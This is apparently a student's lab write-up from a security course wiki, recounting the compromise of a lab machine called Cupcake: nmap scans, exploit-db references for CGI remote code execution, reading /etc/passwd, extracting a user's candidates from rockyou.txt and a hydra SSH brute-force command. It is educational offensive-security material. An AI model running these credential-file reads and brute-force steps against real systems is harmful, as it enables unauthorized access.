Activity 4.1 ‐ Exploiting Cupcake - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Goal of assignment: The purpose of this activity is to give you a sense of some of the steps taken to recon, assess, exploit, achieve a foothold and elevate privileges on a system.

Tools Used:

  • nmap
  • nmaptocsv
  • exploit-db.com

Deliverables:

  1. Information on target:

sudo nmap -v 10.0.5.23 // ran a verbose script against target. I saw that there were two ports opened, so I added a flag to get more info:

sudo nmap -vv -A 10.0.5.23 // added the -A flag, see manual for definition, lots more info

curl 10.0.5.23 // curious about what content is on the webpage, this retrieves it

2/3.

  • Ports running: Port 22 SSH (OpenSSH 5.3 protocol 2.0) /Port 80 (Apache Webserver 2.2.15) (CentOS).

  • Linux 2.6 - 3.10. CentOS 6-7. Cgi-bin was found after running curl.

nmaptocsv -i top100.txt -d ","

image

image

  1. Potential remote vulnerabilities:

https://www.exploit-db.com/exploits/29290 = Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution. “This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu, the vulnerability is present in the default install of the php5-cgi package.” https://www.exploit-db.com/exploits/34900 = Uses environment variables to exploit network

This Source made sense of the second vulnerability.

  1. Determination of the target's kernel version:

image

  • Edited the command provided, and removed some of the benign bits. Was able to get the kernel version.
  1. Similar screenshots that show:
  • Contents of /etc/passwd:

image

  • The code behind the status cgi

image

  • results of running ifconfig

image

  • See trials and tribulations for explanation!
  1. Password List

Fortunately, we had a password list provided to us for this lab (rockyou.txt.gz). The first thing I did was cat the list: cat /usr/share/wordlists/rockyou.txt.gz. When I did this I received a lot of encoded information that was useless to the eye. I ran into this problem before, and the lab hinted towards the fact that we must extract the file to receive readable text. I did this via file manager. I navigated to the location of the file:

image

And pressed: Extract to, where I placed the extracted version of the file into my week04 folder in my class directory. I then ran a cat on that file, which provided cleartext passwords. Then I observed the contents of /etc/passwd, which we explored in deliverable 7. I noticed the majority of users were not able to logon except for a lad named: samwise. This provided me with the user that we know has access to the machine, so I grepped the new password file I had just extracted for samwise:

  • cat rockyou.txt | grep -i samwise > PotentialPasswordsSamWise.txt

Then I ran a cat against our new file:

image

  1. Hydra session:

Here I ran into the issue:

image

I followed this Source to solve the issue, I ran the following commands:

sudo apt update && sudo apt full-upgrade -y
sudo dpkg -l | grep kali-tweaks 
kali-tweaks -h

Then I was greeted with a menu screen, I selected: 'Hardening' and toggled SSH Client to be on:

image

I ran the following command to initiate the hydra session:

sudo hydra -l samwise -P PotentialPasswordsSamWise.txt 10.0.5.23 // I used the username provided from /etc/passwd and for the password portion of the command I parsed through the password file I had created for deliv 8. I was able to receive the expected output:

image

While on the machine I ran: cat user-flag.txt and received the contents of the text file, which I included in the deliv screenshot.

  1. Root access + root-flag.txt:

I followed the video provided and completed this step, screenshot is in lab.

Trials & Tribulations:

For deliverable 7, I really struggled. I had to ask the professor a few times to walk me through the provided commands, which helped make sense of it. I tried to just cat the /etc/passwd file but received the following error:

image

I looked this up and found this Source which explained why I could see the contents of the file. As the source recommended, I pushed the contents of the passwd file to a new file called, TestPW.txt, then I just ran cat textpw.txt and saw the expected output.

This entire lab was extremely eye-opening to me. I have never performed anything like this, and having to undertake this perspective is really informative/mind-boggling at times. I find the concepts to be difficult at first to grasp, but once time is spent actually to understand what is happening, it is extremely satisfying. I really enjoy looking at cyber through this lens because it is allowing me to finally understand what a threat actor is actually doing, which I believe will assist in investigations on incidents.

Sources: